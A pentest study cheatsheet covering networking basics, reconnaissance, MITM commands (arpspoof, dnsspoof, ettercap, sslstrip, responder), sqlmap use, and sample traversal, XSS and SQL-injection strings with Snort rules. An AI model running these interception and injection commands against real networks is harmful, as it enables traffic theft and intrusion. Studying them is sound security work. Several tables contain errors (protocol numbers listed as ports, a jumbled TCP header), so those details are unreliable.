overview edit doc new doc remove

Jan 26, 2018

updated at: May 28, 2019

Pentest Cheatsheet

Accounts

Make (fake) accouts for:

Basics

Networking

IEEE 802:

Type Meaning
802.3 Ethernet
802.8 FiberOptic
802.11 Wifi
802.15.1 Bluetooth
802.16 WiMax

IEEE 802.11:

Type Distance Speed Freq
802.11a 30M 54Mbps 5Ghz
802.11b 100M 11Mbps 2.4Ghz
802.11g 100M 54Mbps 2.4Ghz
802.11n 125M 600Mbps 5Ghz

802.11i is a rewrite of WEP called WPA/TKIP.

Wireless security:

3 way handshake:

----SYN----> 
<--SYNACK---
----ACK---->

DHCP:

Discover --->
<--- Offer
Request --->
<-- Acknowledge

Ipv4 class ranges:

Type Begin End
A 0.0.0.0 127.255.255.255
B 128.0.0.0 191.255.255.255
C 192.0.0.0 223.255.255.255
D 224.0.0.0 239.255.255.255
E 240.0.0.0 255.255.255.255

Well known ports

Port Function TCP UDP
1 ICMP
6 TCP X
17 UDP X
20 FTP X
21 FTP-login X
22 SSH X X
23 Telnet X
25 SMTP X
50 AH
51 ESP
53 DNS X X
80 HTTP X X
88 Kerberos
110 POP3 X X
119 NNTP X
139 netBIOS X X
143 IMAP X X
161 SNMP X X
389 LDAP X X
443 HTTPS X X
465 SMTPS X
514 Remote shell X
636 LDAPS X X
993 IMAPS X X
995 POP3S X X
1080 SOCkS
3389 RDP
6667 IRC

Models

OSI TCP/IP Protocols PDU
Application Application HTTP, FTP, POP, SMTP, DNS, RIP Data
Presentation Application HTTP, FTP, POP, SMTP, DNS, RIP Data
Session Application HTTP, FTP, POP, SMTP, DNS, RIP Data
Transport Transport TCP, UDP Segment
Network Internet IP, ARP, ICMP, IGMP Packets
Data Link Link Ethernet Frames
Physical Link Token ring Bits

Encryption

Symmetric

Algorithm
DES
3DES
AES
IDEA
RC2,4,6
Blowfish

NOTE: RC4 is a stream cipher

Asymmetric

Algorithm
RSA
DSA
ECC
EIGarnal

Hashing

MD5, SHA-1, RIPEDMD, BCRYPT

CIA (Confidentiality, Integrity, Authentication)

Confidentiality Integrity Authentication
DES MD5 PSK
3DES SHA RSA / DSA
AES HMAC-MD5
SEAL HMAC-SHA

Terms and Definitions

HTTP and URLs

HTTP Error Codes

Percent encoding:

ASCII WEB encoded
/ %2F
. %2E
< %3C
> %#E
%20
newline %0A or %0D or %0D%0A

Legal issues

United States

Europe

Physical security

Security Controls

types:

In depth types:

Pentest methodologies

Phases example:

  1. Reconnaissance Information gathering, physical and social engineering, locate network range
  2. Scanning - Enumerating Live hosts, access points, accounts and policies, vulnerability assessment
  3. Gaining Access Breech systems, plant malicious code, backdoors
  4. Maintaining Access Rootkits, unpatched systems
  5. Clearing Tracks IDS evasion, log manipulation, decoy traffic
  6. Reporting

Information gathering:

  1. Unearth initial information What/ Who is the target?
  2. Locate the network range What is the attack surface?
  3. Ascertain active machines What hosts are alive?
  4. Open ports / access points How can they be accessed?
  5. Detect operating systems What platform are they?
  6. Uncover services on ports What software can be attacked?

PTES standard:

  1. Pre-engagement.
  2. Intelligence gathering.
  3. Threat modeling.
  4. Vulnerability analysis.
  5. Exploitation
  6. Post exploitation.
  7. Reporting.

Information gathering

In this phase it is import to use all the information to try to make a custom passwordlist.

Social Engineering

Social engineering is the most powerful attack vector in this phase, you can use SET.

Spoof everything you can, without being seen.

Domain mame service

# whois <site.com>
# nslookup <cr>
> type=mx
> <site.com>
# dig <site.com> any
# host -t ns <site.com>
# host -l <site.com> <nameserver>
# host -t AXFR <site.com> <nameserver>
fierce -dns <site.com>

Attack:

Internet registry:

Google Hacking

Keyword Meaning
site Search only within a domain
ext File extension
loc Maps location
intitle Keywords in the title tag of the page
allintitle Any of the keywords can be in the title
inurl Keywords anywhere in the URL
allinurl Any of the keywords can be in the URL
incache Search Google cache only

Examples:

site:intenseschool.com (ceh ecsa lpt)
intitle:index.of
allinurl:login logon

Discovery Scans

Open web information gathering

Emails

# theharvester -d sevaho.io -l 500 -b all

Printers

Look out for multi purpose printers they can be a golden ticket to the throne room!

Application scans

Metasploit quickstart:

# use <exploit>
# show options
# info <exploit>
# run or exploit

Port scanning

TCP:

# unicornscan -i <interface> -I -mT $IP:a

UDP:

# unicornscan -i <interface> -I -mU $IP:a

Nmap scripts:

# nmap --script "safe and exploit" 192.168.0.2

See https://sevaho.io/docs/CheatSheets/Nmap%20and%20Tcpdump.md

Snif the network

See the appendix for information about protocols

arpspoof

# arpspoof -i eth0 -t <ip> <ip2> # -t : target, tell ip that we are ip2

We need to do this both ways otherwise you will have a DOS.

# arpspoof -i eth0 -t <ip2> <ip>

NOTE: We need to make sure we can forward traffic see: cat /proc/sys/net/ipv4/ip_forward

Example:

The target is 192.168.1.80 and you want to capture all its data to the gateway.

# arpspoof -i eth0 -t 192.168.1.80 192.168.1.1
# arpspoof -i eth0 -t 192.168.1.1 192.168.1.80

dnsspoof

Make a file:

127.0.0.1 www.google.com
# dnsspoof -i eth0 -f <txtfile>

To make the localhost look like another website you can use SET or HTTrack.

Cookie sniffer

Ettercap

# ettercap -Ti eth0 -H arp:remote /192.168.1.1/ /192.168.1.5/
# ettercap -TqM arp:remote /192.168.1.1/ /192.168.1.5/

SSL stripping

This will mitm between a wesite and your target. the target will receive a http wbsite and you will accept the data log in the user over https and redirect back with http.

First w'll redirect data from port 80 to 8080:

# iptables -t nat -A PREROUTING -p tcp --destination-port 80 -j REDIRECT --to-port 8080
sslstrip -l 8080

Responder

Listens for LLMNR and NBT-NS and acts on them.

# responder -i <ip> -b Off -r Off -w On

Web application scanning

SQL mapping

# sqlmap --wizard
# sqlmap -u <site.com> --data="users=test&pass=pass" -b

Exploiting

Wireless attacks

Use a good antenna.

Attacks:

Web

Vulnerability exploiting: xss, csrf and session tokens.

XSS

Embed hook.js on the site and try to make another user go to your embeded site via fe. social engineering.

Reverse shell

Windows

Physical Attacks

Password Cracking

Types:

Rainbow tables

"Time / Memory Trade off" Less memory than a lookup, less computing than a brute force. Salting the hash is a way to combat rainbow tables.

Trojans

Detect trojans:

Phases:

Infection -> Spreading -> Attack

Viruses

Lifecycle:

Design - > Replication -> Launch -> Detection -> Incorporation -> Elimination

Types of viruses

Famous viruses

DoS and DDoS

Types:

Denial of Services and Distributed Denial of Service attacks are embarrassing and inconvenient. They are extremely difficult to prevent from being attempted. The best defense is a well designed network that is hard to overwhelm.

DOS Tools

DDos tools

Buffer Overflows

Terms:

The following functions are dangerous because they do not check the size of the destination buffers:

gets()
strcpy()
strcat()
printf()

The >> operator is also dangerous for the same reason

A buffer overflow attempt (NOP sled):

Apr 5 02:02:09 [3432] : nops: 62.32.54.123:3211 -> 192.168.3.4:135
0x90/0x90/0x90/0x90/0x90/0x90/0x90/0x90/0x90/

Firewalls and IPTables

Types of firewalls

Iptables

There are several default tables for a forwarding firewall to be aware of:

Examples:

# iptables –A FORWARD –j ACCEPT –p tcp --dport 80
# iptables -A FORWARD -p tcp -s 0/0 -d x.y.z.m/32 --destination-port 25 --syn -j ACCEPT
# iptables -A FORWARD -p tcp -s 0/0 -d x.y.z.w/32 --destination-port 80 --syn -j ACCEPT
# iptables -A FORWARD -p tcp -s 0/0 -d x.y.z.w/32 --destination-port 443 --syn -j ACCEPT
# iptables -A FORWARD -p tcp -s 0/0 -d 0/0 --destination-port 22 --syn -j ACCEPT

IDS and Snort

Types

Evasion techniques

Snort rule syntax:

action protocol address prot -> | <> address prot (option:value; option:value;)
# snort -dve -c ./rules.local -l.

Example rules:

# the simplest rule
alert tcp any any -> any any (msg:”Sample alert”; sid:1000000;)

# detecting a simple signature
alert tcp 192.168.1.6 any -> 192.168.1.5 139 \
(msg: “Possible SMBDie Attempt"; content:”|5c 50 49 50 45|”; sid:1000000;)

# dynamic rules (May be phased out in favor of a new method called "tagging")
activate tcp any any -> any 21 (content:"Login"; activates:1; sid:1000000;)
dynamic tcp any any -> any 21 (activated_by: 1; count:100;)

Syntax Recognition

Directory traversal:

[http://www.example.com/scripts/../../../../winnt/system32/cmd.exe?c+dir+c:](http://www.example.com/scripts/../../../../winnt/system32/cmd.exe?c+dir+c:)

XSS:

[http://www.example.com/pages/form.asp?foo=%3Cscript%3Ealert("Hacked")%3C/script%3El](http://www.example.com/pages/form.asp?foo=%3Cscript%3Ealert("Hacked")%3C/script%3El)
ang=

SQL injection:

[http://www.example.com/pages/form.asp?foo=blah'+or+1+=+1+--](http://www.example.com/pages/form.asp?foo=blah'+or+1+=+1+--)
[http://www.example.com/pages/form.asp?foo=%27%3B+insert+into+usertable+("something"](http://www.example.com/pages/form.asp?foo=%27%3B+insert+into+usertable+("something")
)%3B+--lang=
blah' or 1 = 1 --

Buffer overflow:

Apr 5 02:02:09 [3432] : nops: 62.32.54.123:3211 -> 192.168.3.4:135
0x90/0x90/0x90/0x90/0x90/0x90/0x90/0x90/0x90/

Zone transfer:

Apr 5 02:02:09 [3432] : AXFR: 143.32.4.129:4865 -> 192.168.3.4:53

Enumerate emails:

Apr 5 02:02:09 [3432] : VRFY: 78.34.65.45:5674 -> 192.168.3.4:25

Snort:

Alert tcp any any -> any any (msg:"Test Rule"; sid:1000000;)

Iptables:

iptables –A FORWARD –j ACCEPT –p udp –-dport 53

Capture filter:

host 192.168.1.1 and host 192.168.1.2 ip proto 1

Display filter:

ip.addr == 192.168.1.1 && tcp.flags == 0x29

Appendix

MAC Addresses

A Media Access Control address is 48 bits, the first 3 bytes of the MAC is a vendor code. The other three bytes are arbitrarily assigned.

A broadcast MAC address is:

FF:FF:FF:FF:FF:FF

Addresses can be assigned in two ways:

The two least significant bits of the first byte in the OUI address:

nnnnnn0n = Universally administered address
nnnnnn1n = Administratively assigned
nnnnnnn0 = Unicast traffic
nnnnnnn1 = Multicast traffic
                                              ARP
                                             /
                                            /          ICMP
                                           /          /
Networkcard Driver ------> Ethernet Frame-------IPv4-- TCP
                                           \          \
                                            \          UDP
                                             \
                                              IPv6

The most simple protocol on the network is ethernet II frame, it is the communication between the networking chips (low-level), it exists out of 4 byte blocks: source address, destination address, ethernet type, data and CRC. If the ethernet type is equal to x0806 the frame needs to go to the ARP handler, if it's 0x800 it will go to IPv4 handler and if it's 0x86DD it will go to the IPv6 handler.

  6B       6B      2B                      4B                     
._______._______._______._______________._______.
|       |       |       |               |       |
|   DA  |   SA  |   ET  |     DATA      |  CRC  |
|       |       |       |               |       |
|_______|_______|_______|_______________|_______|

Internet Protocol

Internet protocol is responsible for packaging datagrams for delivery between networks. It is a "best effort" protocol with no error control or correction. For more information read RFC 791

Internet Protocol Header

The internet protocol v4 is in the data of the ethernet frame. It exists out of an own header, CRC, SA and DA. If the protocol number is equal to 1 you need to pass the payload to ICMP, if it is equal to 6 it will pass it to TCP, if it's 17 it will pass it to UDP.

  1B       1B      2B     2B      2B     1B     1B   2B    4B   4B                
._______._______._______.______.______._______.____._____.____.____.
|       |       |       |      |      |       |    |     |    |    |
| V & L |  TOS  |   LM  | ID   | F&F  |  TTL  | PN | CRC | DA | SA |       
|       |       |       |      |      |       |    |     |    |    |
|_______|_______|_______|______|______|_______|____|_____|____|____|         

V: version
L: length of header
TOS: type of service
LM: length of the full message
F&F: flags and fragment offset
PN: protocol number

Internet Control Message Protocol

ICMP is a transport protocol that creates message datagrams that can be exchanged by network hosts for troubleshooting, error reporting, and information. For more information read RFC 792 For a complete list of type and codes visit http://www.spirit.com/Resources/icmp.html.

ICMP Header Example:

     1B        1B        2B        4B                  
. _______ . _______ . _______ . _______ .
|         |         |         |         |
| T       | C       | CH      | DATA    |
|         |         |         |         |
| _______ | _______ | _______ | _______ |

T: type
C: code
CH: checksum

Type Code Description:

User Datagram Protocol

User Datagram Protocol is a simple fast transport protocol that is used for its low overhead in situations where error correction and flow control is not needed, such as short bursts of messages. UDP is difficult to firewall off effectively because it is stateless. For more information read RFC 768.

User Datagram Protocol

    2B         2B        2B        2B
. _______ . _______ . _______ . _______ .
|         |         |         |         |
| SA      | DA      | Lenght  | CH      |
|         |         |         |         |
| _______ | _______ | _______ | _______ |

Transmission Control Protocol

TCP provides guaranteed transport and flow control of layer 5-7 messages. Along with IP, ICMP, and UDP, a good solid understanding of this protocol is critical for understanding: Scanning, Firewalls, Intrusion Detection, and various types of DoS attacks. For more information read RFC 793.

Transmission Control Protocol

| 4B   | 4B  | 2B | 2B | 2B  | 4B  | 4B  | 4B  | 2B | 2B |
|------|-----|----|----|-----|-----|-----|-----|----|----|
| DATA | OPT | U  | CH | F&F | TTL | ACK | SEQ | DP | SP |
|------|-----|----|----|-----|-----|-----|-----|----|----|
1